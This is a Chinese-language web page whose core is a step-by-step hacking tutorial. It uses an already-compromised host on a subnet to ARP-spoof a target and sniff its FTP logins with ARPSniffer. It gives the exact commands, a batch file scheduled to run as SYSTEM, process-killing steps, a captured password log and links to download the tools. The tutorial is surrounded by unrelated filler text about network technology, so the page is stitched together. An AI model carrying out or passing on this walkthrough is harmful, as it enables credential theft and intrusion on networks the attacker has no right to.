|
導讀網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據... 網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。 假設想攻擊的主機IP是:61.139.1.79 同一子網下我們已有權限的主機IP是:61.139.1.88并可以3389登陸 第一步: tracert 61.139.1.1 C:\WIN2000\system32>tracert 61.139.1.1 Tracing route to HACK-4FJ7EARC [61.139.1.1] over a maximum of 30 hops: 1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1] Trace complete. 這就說明了你想攻擊的主機和你所在的主機在一個關網中那么就有可能 進行ARPSNIFFER了 第二步:看本機IP設置和網卡情況 C:\WIN2000\system32>ipconfig /all Windows 2000 IP Configuration Host Name . . . . . . . . . . . . : smscomputer Primary DNS Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Broadcast IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter Intel Fast Ethernet LAN Controller - onboard: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 61.139.1.2 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 61.139.1.65 DNS Servers . . . . . . . . . . . : 61.139.1.73 說明只有一塊網卡那么在執行ARPSNIFFER的時候就可以不要第五個參數了這個地 方小榕的主頁可沒有說喲,經過測試我發覺如果只有一塊網卡你第五個參數使用0 的話也只能嗅探到通過自已的數據喲. 從上面我們還可以知道網關是61.139.1.65 第三步:查看本機時間 C:\WIN2000\system32>net time \\127.0.0.1 \\127.0.0.1 的當前時間是 2003/1/28 下午 09:13 命令完成成功 要注意的是這兒的時間是12小時式,用at命令應要24小時式 第四步:編寫啟動ARPsniffer的bat文件 C:\WIN2000\system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:\winnt\a.bat 注意咯我們沒有要第五個參數,如果有多個網卡的話你就要先直接執行arpsniffer顯示如下: ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB www.netXeyes.com 2002, security@vip.sina.com Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(這個地方選第五個參數) Usage: ArpSniffer <IP1> <IP2> <Sniffer TCP Port> <LogFile> <NetAdp> [/RESET] 第五步:后臺運行開始嗅探咯 C:\winnt\system32>at \\127.0.0.1 20:44 c:\winnt\a.bat 注意:這兒的時間要用24小時式 arpsniffer最好拷到system32目錄下,記錄文件也會生成在這兒 執行完第四步要先安裝WINPCAP 2.1驅動 同時arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注冊表重啟機子 第六步:看密碼但是生成的記錄文件不能直接看也不能拷貝所以我們只能先結束掉 以SYSTEM權限啟動的ARPSniffer程序 C:\winnt\system32>pulist ................... conime.exe 248 NT AUTHORITY\SYSTEM explorer.exe 1864 SMSCOMPUTER\Administrator CSRSS.EXE 2256 NT AUTHORITY\SYSTEM Arpsniffer.exe 2322 NT AUTHORITY\SYSTEM ----就是它了! WINLOGON.EXE 2344 NT AUTHORITY\SYSTEM ...................... 殺了它 C:\winnt\system32>pskill 2322 PsKill v1.03 - local and remote process killer Copyright (C) 2000 Mark Russinovich http://www.sysinternals.com Process 2322 killed. C:\winnt\system32>type 1.txt 我的例子中嗅探的是FTP密碼:) ............... 61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb 61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in. 61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in. 61.188.218.179(1404)->61.139.1.79(21)QUIT 61.188.218.179(1404)->61.139.1.79(21)QUIT 61.139.1.79(21)->61.188.218.179(1404)221 61.139.1.79(21)->61.188.218.179(1404)221 ............ ............ 特別要注意的就是PASS哈:) ---------------------------------------------------- 付錄: 前臺正常執行的顯示 C:\>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB www.netXeyes.com 2002, security@vip.sina.com Network Adapter 0: Intel(R) 8255x Based Network Connection Enable IP Router....OK Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02 Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6 Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88 Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88 有時這兒要先顯示can not open driver(0)不管它等一下就可以了 Begin Sniffer......... 文章中提到的程序下載: pskill.exe/pulist.exe 在 http://www.haowawa.com/down/pstools/ APRSniffer和winpcap驅動 http://www.netxeyes.org/2002.html 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!